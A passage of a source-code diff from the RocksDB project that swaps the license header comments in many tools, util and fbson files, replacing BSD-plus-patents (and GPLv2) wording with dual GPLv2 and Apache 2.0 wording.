-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/third-party/fbson/FbsonDocument.h b/third-party/fbson/FbsonDocument.h
index 9a00e247141..6fb8a93f171 100644
--- a/third-party/fbson/FbsonDocument.h
+++ b/third-party/fbson/FbsonDocument.h
@@ -1,12 +1,7 @@
-/*
- * Copyright (c) 2011-present, Facebook, Inc.
- * All rights reserved.
- *
- * This source code is licensed under the BSD-style license found in the
- * LICENSE file in the root directory of this source tree. An additional grant
- * of patent rights can be found in the PATENTS file in the same directory.
- *
- */
+// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 /*
  * This header defines FbsonDocument, FbsonKeyValue, and various value classes
diff --git a/third-party/fbson/FbsonJsonParser.h b/third-party/fbson/FbsonJsonParser.h
index 678d970fb0b..63b03e2b908 100644
--- a/third-party/fbson/FbsonJsonParser.h
+++ b/third-party/fbson/FbsonJsonParser.h
@@ -1,12 +1,7 @@
-/*
- * Copyright (c) 2011-present, Facebook, Inc.
- * All rights reserved.
- *
- * This source code is licensed under the BSD-style license found in the
- * LICENSE file in the root directory of this source tree. An additional grant
- * of patent rights can be found in the PATENTS file in the same directory.
- *
- */
+// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 /*
  * This file defines FbsonJsonParserT (template) and FbsonJsonParser.
diff --git a/third-party/fbson/FbsonStream.h b/third-party/fbson/FbsonStream.h
index 5f70221db50..12723ea30e2 100644
--- a/third-party/fbson/FbsonStream.h
+++ b/third-party/fbson/FbsonStream.h
@@ -1,12 +1,7 @@
-/*
- * Copyright (c) 2011-present, Facebook, Inc.
- * All rights reserved.
- *
- * This source code is licensed under the BSD-style license found in the
- * LICENSE file in the root directory of this source tree. An additional grant
- * of patent rights can be found in the PATENTS file in the same directory.
- *
- */
+// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 /*
  * This header file defines FbsonInBuffer and FbsonOutStream classes.
diff --git a/third-party/fbson/FbsonUtil.h b/third-party/fbson/FbsonUtil.h
index 2c415476996..2b6d6f5c973 100644
--- a/third-party/fbson/FbsonUtil.h
+++ b/third-party/fbson/FbsonUtil.h
@@ -1,12 +1,7 @@
-/*
- * Copyright (c) 2011-present, Facebook, Inc.
- * All rights reserved.
- *
- * This source code is licensed under the BSD-style license found in the
- * LICENSE file in the root directory of this source tree. An additional grant
- * of patent rights can be found in the PATENTS file in the same directory.
- *
- */
+// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 /*
  * This header file defines miscellaneous utility classes.
diff --git a/third-party/fbson/FbsonWriter.h b/third-party/fbson/FbsonWriter.h
index 4efaf817c27..a254e9bbf83 100644
--- a/third-party/fbson/FbsonWriter.h
+++ b/third-party/fbson/FbsonWriter.h
@@ -1,12 +1,7 @@
-/*
- * Copyright (c) 2011-present, Facebook, Inc.
- * All rights reserved.
- *
- * This source code is licensed under the BSD-style license found in the
- * LICENSE file in the root directory of this source tree. An additional grant
- * of patent rights can be found in the PATENTS file in the same directory.
- *
- */
+// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 /*
  * This file defines FbsonWriterT (template) and FbsonWriter.
diff --git a/tools/blob_dump.cc b/tools/blob_dump.cc
index 9b9e9130428..73601f2d80f 100644
--- a/tools/blob_dump.cc
+++ b/tools/blob_dump.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #include
diff --git a/tools/db_bench.cc b/tools/db_bench.cc
index 3d51b73ce51..634bbba30ac 100644
--- a/tools/db_bench.cc
+++ b/tools/db_bench.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2013-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc
index f8237670ebe..0cc424eeab2 100644
--- a/tools/db_bench_tool.cc
+++ b/tools/db_bench_tool.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/tools/db_bench_tool_test.cc b/tools/db_bench_tool_test.cc
index e2d4a540a4a..145f329deae 100644
--- a/tools/db_bench_tool_test.cc
+++ b/tools/db_bench_tool_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/tools/db_repl_stress.cc b/tools/db_repl_stress.cc
index 0829bf58ac0..fac73c0668e 100644
--- a/tools/db_repl_stress.cc
+++ b/tools/db_repl_stress.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #ifndef GFLAGS
diff --git a/tools/db_sanity_test.cc b/tools/db_sanity_test.cc
index 18990ce824c..b40fe6134cb 100644
--- a/tools/db_sanity_test.cc
+++ b/tools/db_sanity_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
 #include
diff --git a/tools/db_stress.cc b/tools/db_stress.cc
index ef7273ee887..db905f0c887 100644
--- a/tools/db_stress.cc
+++ b/tools/db_stress.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/tools/dump/db_dump_tool.cc b/tools/dump/db_dump_tool.cc
index ea332e19e4e..8c5fa82e5b9 100644
--- a/tools/dump/db_dump_tool.cc
+++ b/tools/dump/db_dump_tool.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/tools/dump/rocksdb_dump.cc b/tools/dump/rocksdb_dump.cc
index db06f6b326f..ddbfc2fb69f 100644
--- a/tools/dump/rocksdb_dump.cc
+++ b/tools/dump/rocksdb_dump.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #if !(defined GFLAGS) || defined(ROCKSDB_LITE)
diff --git a/tools/dump/rocksdb_undump.cc b/tools/dump/rocksdb_undump.cc
index 1dd24e67efc..0d04ccaa681 100644
--- a/tools/dump/rocksdb_undump.cc
+++ b/tools/dump/rocksdb_undump.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #if !(defined GFLAGS) || defined(ROCKSDB_LITE)
diff --git a/tools/ldb.cc b/tools/ldb.cc
index e7abc3efc09..6f70de6a6c7 100644
--- a/tools/ldb.cc
+++ b/tools/ldb.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/tools/ldb_cmd.cc b/tools/ldb_cmd.cc
index 597e9bc2110..2cd4d94d112 100644
--- a/tools/ldb_cmd.cc
+++ b/tools/ldb_cmd.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
 #include "rocksdb/utilities/ldb_cmd.h"
diff --git a/tools/ldb_cmd_impl.h b/tools/ldb_cmd_impl.h
index 375dbf685bb..91afd2674c2 100644
--- a/tools/ldb_cmd_impl.h
+++ b/tools/ldb_cmd_impl.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/tools/ldb_cmd_test.cc b/tools/ldb_cmd_test.cc
index 2d63e93e665..16f9631dad8 100644
--- a/tools/ldb_cmd_test.cc
+++ b/tools/ldb_cmd_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/tools/ldb_tool.cc b/tools/ldb_tool.cc
index 17ea76f7de6..e8229ef7b91 100644
--- a/tools/ldb_tool.cc
+++ b/tools/ldb_tool.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
 #include "rocksdb/ldb_tool.h"
diff --git a/tools/reduce_levels_test.cc b/tools/reduce_levels_test.cc
index 974e82bdbe6..7fe38bf7e8d 100644
--- a/tools/reduce_levels_test.cc
+++ b/tools/reduce_levels_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/tools/sst_dump.cc b/tools/sst_dump.cc
index a3f7186eb85..617d7581553 100644
--- a/tools/sst_dump.cc
+++ b/tools/sst_dump.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/tools/sst_dump_test.cc b/tools/sst_dump_test.cc
index c3697dc36c3..0a222afa33a 100644
--- a/tools/sst_dump_test.cc
+++ b/tools/sst_dump_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2012 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/tools/sst_dump_tool.cc b/tools/sst_dump_tool.cc
index 000167a777b..2a1729c7651 100644
--- a/tools/sst_dump_tool.cc
+++ b/tools/sst_dump_tool.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/tools/sst_dump_tool_imp.h b/tools/sst_dump_tool_imp.h
index 0511472508c..0129d98ebc7 100644
--- a/tools/sst_dump_tool_imp.h
+++ b/tools/sst_dump_tool_imp.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/tools/write_stress.cc b/tools/write_stress.cc
index 35bb6c208da..597e93798c6 100644
--- a/tools/write_stress.cc
+++ b/tools/write_stress.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 //
 // The goal of this tool is to be a simple stress test with focus on catching:
diff --git a/util/aligned_buffer.h b/util/aligned_buffer.h
index 0c2ec5059e2..e93f4b5c665 100644
--- a/util/aligned_buffer.h
+++ b/util/aligned_buffer.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/allocator.h b/util/allocator.h
index 3772a278ff1..505d6ba2bbf 100644
--- a/util/allocator.h
+++ b/util/allocator.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/arena.cc b/util/arena.cc
index b5ddf564aaf..6185b5c5585 100644
--- a/util/arena.cc
+++ b/util/arena.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/arena.h b/util/arena.h
index 94f81eeabb0..a2093517162 100644
--- a/util/arena.h
+++ b/util/arena.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/arena_test.cc b/util/arena_test.cc
index 10501ac7431..a033765adcb 100644
--- a/util/arena_test.cc
+++ b/util/arena_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/auto_roll_logger.cc b/util/auto_roll_logger.cc
index 39db9b5c831..ae6061aed43 100644
--- a/util/auto_roll_logger.cc
+++ b/util/auto_roll_logger.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #include "util/auto_roll_logger.h"
 #include "util/mutexlock.h"
diff --git a/util/auto_roll_logger.h b/util/auto_roll_logger.h
index 823120e3f87..2f1f943d6a6 100644
--- a/util/auto_roll_logger.h
+++ b/util/auto_roll_logger.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Logger implementation that can be shared by all environments
 // where enough posix functionality is available.
diff --git a/util/auto_roll_logger_test.cc b/util/auto_roll_logger_test.cc
index 910ddfee5b9..9b39748ce73 100644
--- a/util/auto_roll_logger_test.cc
+++ b/util/auto_roll_logger_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/util/autovector.h b/util/autovector.h
index 48635a95bc3..b5c84712450 100644
--- a/util/autovector.h
+++ b/util/autovector.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #include
diff --git a/util/autovector_test.cc b/util/autovector_test.cc
index 888b9db231f..2d7bcea57d8 100644
--- a/util/autovector_test.cc
+++ b/util/autovector_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
 #include
diff --git a/util/bloom.cc b/util/bloom.cc
index 5101f7931ce..9af17f87328 100644
--- a/util/bloom.cc
+++ b/util/bloom.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2012 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/bloom_test.cc b/util/bloom_test.cc
index e868021e503..9c323414ece 100644
--- a/util/bloom_test.cc
+++ b/util/bloom_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2012 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/build_version.h b/util/build_version.h
index d946b017aac..36ff92c078d 100644
--- a/util/build_version.h
+++ b/util/build_version.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
 #if !defined(IOS_CROSS_COMPILE)
diff --git a/util/channel.h b/util/channel.h
index 013fd463231..1b030192cf9 100644
--- a/util/channel.h
+++ b/util/channel.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
 #include
diff --git a/util/coding.cc b/util/coding.cc
index 83b8bec3d74..3b58e3f1fae 100644
--- a/util/coding.cc
+++ b/util/coding.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/coding.h b/util/coding.h
index be33dba8d37..5cf009472ac 100644
--- a/util/coding.h
+++ b/util/coding.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
